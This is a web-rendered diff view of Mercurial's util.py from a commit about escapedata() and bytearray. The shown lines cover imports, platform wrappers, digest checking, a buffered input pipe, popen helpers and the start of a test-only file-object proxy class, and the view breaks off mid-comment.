##// END OF EJS Templates
util: teach escapedata() about bytearray...
Gregory Szorc -
r36647:c98d1c67 default
parent child Browse files
Show More
@@ -1,4042 +1,4045 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 # disable Python's problematic floating point timestamps (issue4836)
179 # disable Python's problematic floating point timestamps (issue4836)
180 # (Python hypocritically says you shouldn't change this behavior in
180 # (Python hypocritically says you shouldn't change this behavior in
181 # libraries, and sure enough Mercurial is not a library.)
181 # libraries, and sure enough Mercurial is not a library.)
182 os.stat_float_times(False)
182 os.stat_float_times(False)
183
183
184 def safehasattr(thing, attr):
184 def safehasattr(thing, attr):
185 return getattr(thing, attr, _notset) is not _notset
185 return getattr(thing, attr, _notset) is not _notset
186
186
187 def _rapply(f, xs):
187 def _rapply(f, xs):
188 if xs is None:
188 if xs is None:
189 # assume None means non-value of optional data
189 # assume None means non-value of optional data
190 return xs
190 return xs
191 if isinstance(xs, (list, set, tuple)):
191 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
192 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
193 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
195 return f(xs)
196
196
197 def rapply(f, xs):
197 def rapply(f, xs):
198 """Apply function recursively to every item preserving the data structure
198 """Apply function recursively to every item preserving the data structure
199
199
200 >>> def f(x):
200 >>> def f(x):
201 ... return 'f(%s)' % x
201 ... return 'f(%s)' % x
202 >>> rapply(f, None) is None
202 >>> rapply(f, None) is None
203 True
203 True
204 >>> rapply(f, 'a')
204 >>> rapply(f, 'a')
205 'f(a)'
205 'f(a)'
206 >>> rapply(f, {'a'}) == {'f(a)'}
206 >>> rapply(f, {'a'}) == {'f(a)'}
207 True
207 True
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210
210
211 >>> xs = [object()]
211 >>> xs = [object()]
212 >>> rapply(pycompat.identity, xs) is xs
212 >>> rapply(pycompat.identity, xs) is xs
213 True
213 True
214 """
214 """
215 if f is pycompat.identity:
215 if f is pycompat.identity:
216 # fast path mainly for py2
216 # fast path mainly for py2
217 return xs
217 return xs
218 return _rapply(f, xs)
218 return _rapply(f, xs)
219
219
220 def bytesinput(fin, fout, *args, **kwargs):
220 def bytesinput(fin, fout, *args, **kwargs):
221 sin, sout = sys.stdin, sys.stdout
221 sin, sout = sys.stdin, sys.stdout
222 try:
222 try:
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 finally:
225 finally:
226 sys.stdin, sys.stdout = sin, sout
226 sys.stdin, sys.stdout = sin, sout
227
227
228 def bitsfrom(container):
228 def bitsfrom(container):
229 bits = 0
229 bits = 0
230 for bit in container:
230 for bit in container:
231 bits |= bit
231 bits |= bit
232 return bits
232 return bits
233
233
234 # python 2.6 still have deprecation warning enabled by default. We do not want
234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # to display anything to standard user so detect if we are running test and
235 # to display anything to standard user so detect if we are running test and
236 # only use python deprecation warning in this case.
236 # only use python deprecation warning in this case.
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 if _dowarn:
238 if _dowarn:
239 # explicitly unfilter our warning for python 2.7
239 # explicitly unfilter our warning for python 2.7
240 #
240 #
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 if _dowarn and pycompat.ispy3:
248 if _dowarn and pycompat.ispy3:
249 # silence warning emitted by passing user string to re.sub()
249 # silence warning emitted by passing user string to re.sub()
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 r'mercurial')
251 r'mercurial')
252
252
253 def nouideprecwarn(msg, version, stacklevel=1):
253 def nouideprecwarn(msg, version, stacklevel=1):
254 """Issue an python native deprecation warning
254 """Issue an python native deprecation warning
255
255
256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
257 """
257 """
258 if _dowarn:
258 if _dowarn:
259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
260 " update your code.)") % version
260 " update your code.)") % version
261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
262
262
263 DIGESTS = {
263 DIGESTS = {
264 'md5': hashlib.md5,
264 'md5': hashlib.md5,
265 'sha1': hashlib.sha1,
265 'sha1': hashlib.sha1,
266 'sha512': hashlib.sha512,
266 'sha512': hashlib.sha512,
267 }
267 }
268 # List of digest types from strongest to weakest
268 # List of digest types from strongest to weakest
269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
270
270
271 for k in DIGESTS_BY_STRENGTH:
271 for k in DIGESTS_BY_STRENGTH:
272 assert k in DIGESTS
272 assert k in DIGESTS
273
273
274 class digester(object):
274 class digester(object):
275 """helper to compute digests.
275 """helper to compute digests.
276
276
277 This helper can be used to compute one or more digests given their name.
277 This helper can be used to compute one or more digests given their name.
278
278
279 >>> d = digester([b'md5', b'sha1'])
279 >>> d = digester([b'md5', b'sha1'])
280 >>> d.update(b'foo')
280 >>> d.update(b'foo')
281 >>> [k for k in sorted(d)]
281 >>> [k for k in sorted(d)]
282 ['md5', 'sha1']
282 ['md5', 'sha1']
283 >>> d[b'md5']
283 >>> d[b'md5']
284 'acbd18db4cc2f85cedef654fccc4a4d8'
284 'acbd18db4cc2f85cedef654fccc4a4d8'
285 >>> d[b'sha1']
285 >>> d[b'sha1']
286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
287 >>> digester.preferred([b'md5', b'sha1'])
287 >>> digester.preferred([b'md5', b'sha1'])
288 'sha1'
288 'sha1'
289 """
289 """
290
290
291 def __init__(self, digests, s=''):
291 def __init__(self, digests, s=''):
292 self._hashes = {}
292 self._hashes = {}
293 for k in digests:
293 for k in digests:
294 if k not in DIGESTS:
294 if k not in DIGESTS:
295 raise Abort(_('unknown digest type: %s') % k)
295 raise Abort(_('unknown digest type: %s') % k)
296 self._hashes[k] = DIGESTS[k]()
296 self._hashes[k] = DIGESTS[k]()
297 if s:
297 if s:
298 self.update(s)
298 self.update(s)
299
299
300 def update(self, data):
300 def update(self, data):
301 for h in self._hashes.values():
301 for h in self._hashes.values():
302 h.update(data)
302 h.update(data)
303
303
304 def __getitem__(self, key):
304 def __getitem__(self, key):
305 if key not in DIGESTS:
305 if key not in DIGESTS:
306 raise Abort(_('unknown digest type: %s') % k)
306 raise Abort(_('unknown digest type: %s') % k)
307 return nodemod.hex(self._hashes[key].digest())
307 return nodemod.hex(self._hashes[key].digest())
308
308
309 def __iter__(self):
309 def __iter__(self):
310 return iter(self._hashes)
310 return iter(self._hashes)
311
311
312 @staticmethod
312 @staticmethod
313 def preferred(supported):
313 def preferred(supported):
314 """returns the strongest digest type in both supported and DIGESTS."""
314 """returns the strongest digest type in both supported and DIGESTS."""
315
315
316 for k in DIGESTS_BY_STRENGTH:
316 for k in DIGESTS_BY_STRENGTH:
317 if k in supported:
317 if k in supported:
318 return k
318 return k
319 return None
319 return None
320
320
321 class digestchecker(object):
321 class digestchecker(object):
322 """file handle wrapper that additionally checks content against a given
322 """file handle wrapper that additionally checks content against a given
323 size and digests.
323 size and digests.
324
324
325 d = digestchecker(fh, size, {'md5': '...'})
325 d = digestchecker(fh, size, {'md5': '...'})
326
326
327 When multiple digests are given, all of them are validated.
327 When multiple digests are given, all of them are validated.
328 """
328 """
329
329
330 def __init__(self, fh, size, digests):
330 def __init__(self, fh, size, digests):
331 self._fh = fh
331 self._fh = fh
332 self._size = size
332 self._size = size
333 self._got = 0
333 self._got = 0
334 self._digests = dict(digests)
334 self._digests = dict(digests)
335 self._digester = digester(self._digests.keys())
335 self._digester = digester(self._digests.keys())
336
336
337 def read(self, length=-1):
337 def read(self, length=-1):
338 content = self._fh.read(length)
338 content = self._fh.read(length)
339 self._digester.update(content)
339 self._digester.update(content)
340 self._got += len(content)
340 self._got += len(content)
341 return content
341 return content
342
342
343 def validate(self):
343 def validate(self):
344 if self._size != self._got:
344 if self._size != self._got:
345 raise Abort(_('size mismatch: expected %d, got %d') %
345 raise Abort(_('size mismatch: expected %d, got %d') %
346 (self._size, self._got))
346 (self._size, self._got))
347 for k, v in self._digests.items():
347 for k, v in self._digests.items():
348 if v != self._digester[k]:
348 if v != self._digester[k]:
349 # i18n: first parameter is a digest name
349 # i18n: first parameter is a digest name
350 raise Abort(_('%s mismatch: expected %s, got %s') %
350 raise Abort(_('%s mismatch: expected %s, got %s') %
351 (k, v, self._digester[k]))
351 (k, v, self._digester[k]))
352
352
353 try:
353 try:
354 buffer = buffer
354 buffer = buffer
355 except NameError:
355 except NameError:
356 def buffer(sliceable, offset=0, length=None):
356 def buffer(sliceable, offset=0, length=None):
357 if length is not None:
357 if length is not None:
358 return memoryview(sliceable)[offset:offset + length]
358 return memoryview(sliceable)[offset:offset + length]
359 return memoryview(sliceable)[offset:]
359 return memoryview(sliceable)[offset:]
360
360
361 closefds = pycompat.isposix
361 closefds = pycompat.isposix
362
362
363 _chunksize = 4096
363 _chunksize = 4096
364
364
365 class bufferedinputpipe(object):
365 class bufferedinputpipe(object):
366 """a manually buffered input pipe
366 """a manually buffered input pipe
367
367
368 Python will not let us use buffered IO and lazy reading with 'polling' at
368 Python will not let us use buffered IO and lazy reading with 'polling' at
369 the same time. We cannot probe the buffer state and select will not detect
369 the same time. We cannot probe the buffer state and select will not detect
370 that data are ready to read if they are already buffered.
370 that data are ready to read if they are already buffered.
371
371
372 This class let us work around that by implementing its own buffering
372 This class let us work around that by implementing its own buffering
373 (allowing efficient readline) while offering a way to know if the buffer is
373 (allowing efficient readline) while offering a way to know if the buffer is
374 empty from the output (allowing collaboration of the buffer with polling).
374 empty from the output (allowing collaboration of the buffer with polling).
375
375
376 This class lives in the 'util' module because it makes use of the 'os'
376 This class lives in the 'util' module because it makes use of the 'os'
377 module from the python stdlib.
377 module from the python stdlib.
378 """
378 """
379 def __new__(cls, fh):
379 def __new__(cls, fh):
380 # If we receive a fileobjectproxy, we need to use a variation of this
380 # If we receive a fileobjectproxy, we need to use a variation of this
381 # class that notifies observers about activity.
381 # class that notifies observers about activity.
382 if isinstance(fh, fileobjectproxy):
382 if isinstance(fh, fileobjectproxy):
383 cls = observedbufferedinputpipe
383 cls = observedbufferedinputpipe
384
384
385 return super(bufferedinputpipe, cls).__new__(cls)
385 return super(bufferedinputpipe, cls).__new__(cls)
386
386
387 def __init__(self, input):
387 def __init__(self, input):
388 self._input = input
388 self._input = input
389 self._buffer = []
389 self._buffer = []
390 self._eof = False
390 self._eof = False
391 self._lenbuf = 0
391 self._lenbuf = 0
392
392
393 @property
393 @property
394 def hasbuffer(self):
394 def hasbuffer(self):
395 """True is any data is currently buffered
395 """True is any data is currently buffered
396
396
397 This will be used externally a pre-step for polling IO. If there is
397 This will be used externally a pre-step for polling IO. If there is
398 already data then no polling should be set in place."""
398 already data then no polling should be set in place."""
399 return bool(self._buffer)
399 return bool(self._buffer)
400
400
401 @property
401 @property
402 def closed(self):
402 def closed(self):
403 return self._input.closed
403 return self._input.closed
404
404
405 def fileno(self):
405 def fileno(self):
406 return self._input.fileno()
406 return self._input.fileno()
407
407
408 def close(self):
408 def close(self):
409 return self._input.close()
409 return self._input.close()
410
410
411 def read(self, size):
411 def read(self, size):
412 while (not self._eof) and (self._lenbuf < size):
412 while (not self._eof) and (self._lenbuf < size):
413 self._fillbuffer()
413 self._fillbuffer()
414 return self._frombuffer(size)
414 return self._frombuffer(size)
415
415
416 def readline(self, *args, **kwargs):
416 def readline(self, *args, **kwargs):
417 if 1 < len(self._buffer):
417 if 1 < len(self._buffer):
418 # this should not happen because both read and readline end with a
418 # this should not happen because both read and readline end with a
419 # _frombuffer call that collapse it.
419 # _frombuffer call that collapse it.
420 self._buffer = [''.join(self._buffer)]
420 self._buffer = [''.join(self._buffer)]
421 self._lenbuf = len(self._buffer[0])
421 self._lenbuf = len(self._buffer[0])
422 lfi = -1
422 lfi = -1
423 if self._buffer:
423 if self._buffer:
424 lfi = self._buffer[-1].find('\n')
424 lfi = self._buffer[-1].find('\n')
425 while (not self._eof) and lfi < 0:
425 while (not self._eof) and lfi < 0:
426 self._fillbuffer()
426 self._fillbuffer()
427 if self._buffer:
427 if self._buffer:
428 lfi = self._buffer[-1].find('\n')
428 lfi = self._buffer[-1].find('\n')
429 size = lfi + 1
429 size = lfi + 1
430 if lfi < 0: # end of file
430 if lfi < 0: # end of file
431 size = self._lenbuf
431 size = self._lenbuf
432 elif 1 < len(self._buffer):
432 elif 1 < len(self._buffer):
433 # we need to take previous chunks into account
433 # we need to take previous chunks into account
434 size += self._lenbuf - len(self._buffer[-1])
434 size += self._lenbuf - len(self._buffer[-1])
435 return self._frombuffer(size)
435 return self._frombuffer(size)
436
436
437 def _frombuffer(self, size):
437 def _frombuffer(self, size):
438 """return at most 'size' data from the buffer
438 """return at most 'size' data from the buffer
439
439
440 The data are removed from the buffer."""
440 The data are removed from the buffer."""
441 if size == 0 or not self._buffer:
441 if size == 0 or not self._buffer:
442 return ''
442 return ''
443 buf = self._buffer[0]
443 buf = self._buffer[0]
444 if 1 < len(self._buffer):
444 if 1 < len(self._buffer):
445 buf = ''.join(self._buffer)
445 buf = ''.join(self._buffer)
446
446
447 data = buf[:size]
447 data = buf[:size]
448 buf = buf[len(data):]
448 buf = buf[len(data):]
449 if buf:
449 if buf:
450 self._buffer = [buf]
450 self._buffer = [buf]
451 self._lenbuf = len(buf)
451 self._lenbuf = len(buf)
452 else:
452 else:
453 self._buffer = []
453 self._buffer = []
454 self._lenbuf = 0
454 self._lenbuf = 0
455 return data
455 return data
456
456
457 def _fillbuffer(self):
457 def _fillbuffer(self):
458 """read data to the buffer"""
458 """read data to the buffer"""
459 data = os.read(self._input.fileno(), _chunksize)
459 data = os.read(self._input.fileno(), _chunksize)
460 if not data:
460 if not data:
461 self._eof = True
461 self._eof = True
462 else:
462 else:
463 self._lenbuf += len(data)
463 self._lenbuf += len(data)
464 self._buffer.append(data)
464 self._buffer.append(data)
465
465
466 return data
466 return data
467
467
468 def mmapread(fp):
468 def mmapread(fp):
469 try:
469 try:
470 fd = getattr(fp, 'fileno', lambda: fp)()
470 fd = getattr(fp, 'fileno', lambda: fp)()
471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
472 except ValueError:
472 except ValueError:
473 # Empty files cannot be mmapped, but mmapread should still work. Check
473 # Empty files cannot be mmapped, but mmapread should still work. Check
474 # if the file is empty, and if so, return an empty buffer.
474 # if the file is empty, and if so, return an empty buffer.
475 if os.fstat(fd).st_size == 0:
475 if os.fstat(fd).st_size == 0:
476 return ''
476 return ''
477 raise
477 raise
478
478
479 def popen2(cmd, env=None, newlines=False):
479 def popen2(cmd, env=None, newlines=False):
480 # Setting bufsize to -1 lets the system decide the buffer size.
480 # Setting bufsize to -1 lets the system decide the buffer size.
481 # The default for bufsize is 0, meaning unbuffered. This leads to
481 # The default for bufsize is 0, meaning unbuffered. This leads to
482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
484 close_fds=closefds,
484 close_fds=closefds,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 universal_newlines=newlines,
486 universal_newlines=newlines,
487 env=env)
487 env=env)
488 return p.stdin, p.stdout
488 return p.stdin, p.stdout
489
489
490 def popen3(cmd, env=None, newlines=False):
490 def popen3(cmd, env=None, newlines=False):
491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
492 return stdin, stdout, stderr
492 return stdin, stdout, stderr
493
493
494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
496 close_fds=closefds,
496 close_fds=closefds,
497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
498 stderr=subprocess.PIPE,
498 stderr=subprocess.PIPE,
499 universal_newlines=newlines,
499 universal_newlines=newlines,
500 env=env)
500 env=env)
501 return p.stdin, p.stdout, p.stderr, p
501 return p.stdin, p.stdout, p.stderr, p
502
502
503 class fileobjectproxy(object):
503 class fileobjectproxy(object):
504 """A proxy around file objects that tells a watcher when events occur.
504 """A proxy around file objects that tells a watcher when events occur.
505
505
506 This type is intended to only be used for testing purposes. Think hard
506 This type is intended to only be used for testing purposes. Think hard
507 before using it in important code.
507 before using it in important code.
508 """
508 """
509 __slots__ = (
509 __slots__ = (
510 r'_orig',
510 r'_orig',
511 r'_observer',
511 r'_observer',
512 )
512 )
513
513
514 def __init__(self, fh, observer):
514 def __init__(self, fh, observer):
515 object.__setattr__(self, r'_orig', fh)
515 object.__setattr__(self, r'_orig', fh)
516 object.__setattr__(self, r'_observer', observer)
516 object.__setattr__(self, r'_observer', observer)
517
517
518 def __getattribute__(self, name):
518 def __getattribute__(self, name):
519 ours = {
519 ours = {
520 r'_observer',
520 r'_observer',
521
521
522 # IOBase
522 # IOBase
523 r'close',
523 r'close',
524 # closed if a property
524 # closed if a property
525 r'fileno',
525 r'fileno',
526 r'flush',
526 r'flush',
527 r'isatty',
527 r'isatty',
528 r'readable',
528 r'readable',
529 r'readline',
529 r'readline',
530 r'readlines',
530 r'readlines',
531 r'seek',
531 r'seek',
532 r'seekable',
532 r'seekable',
533 r'tell',
533 r'tell',
534 r'truncate',
534 r'truncate',
535 r'writable',
535 r'writable',
536 r'writelines',
536 r'writelines',
537 # RawIOBase
537 # RawIOBase
538 r'read',
538 r'read',
539 r'readall',
539 r'readall',
540 r'readinto',
540 r'readinto',
541 r'write',
541 r'write',
542 # BufferedIOBase
542 # BufferedIOBase
543 # raw is a property
543 # raw is a property
544 r'detach',
544 r'detach',
545 # read defined above
545 # read defined above
546 r'read1',
546 r'read1',
547 # readinto defined above
547 # readinto defined above
548 # write defined above
548 # write defined above
549 }
549 }
550
550
551 # We only observe some methods.
551 # We only observe some methods.
552 if name in ours:
552 if name in ours:
553 return object.__getattribute__(self, name)
553 return object.__getattribute__(self, name)
554
554
555 return getattr(object.__getattribute__(self, r'_orig'), name)
555 return getattr(object.__getattribute__(self, r'_orig'), name)
556
556
557 def __delattr__(self, name):
557 def __delattr__(self, name):
558 return delattr(object.__getattribute__(self, r'_orig'), name)
558 return delattr(object.__getattribute__(self, r'_orig'), name)
559
559
560 def __setattr__(self, name, value):
560 def __setattr__(self, name, value):
561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
562
562
563 def __iter__(self):
563 def __iter__(self):
564 return object.__getattribute__(self, r'_orig').__iter__()
564 return object.__getattribute__(self, r'_orig').__iter__()
565
565
566 def _observedcall(self, name, *args, **kwargs):
566 def _observedcall(self, name, *args, **kwargs):
567 # Call the original object.
567 # Call the original object.
568 orig = object.__getattribute__(self, r'_orig')
568 orig = object.__getattribute__(self, r'_orig')
569 res = getattr(orig, name)(*args, **kwargs)
569 res = getattr(orig, name)(*args, **kwargs)
570
570
571 # Call a method on the observer of the same name with arguments
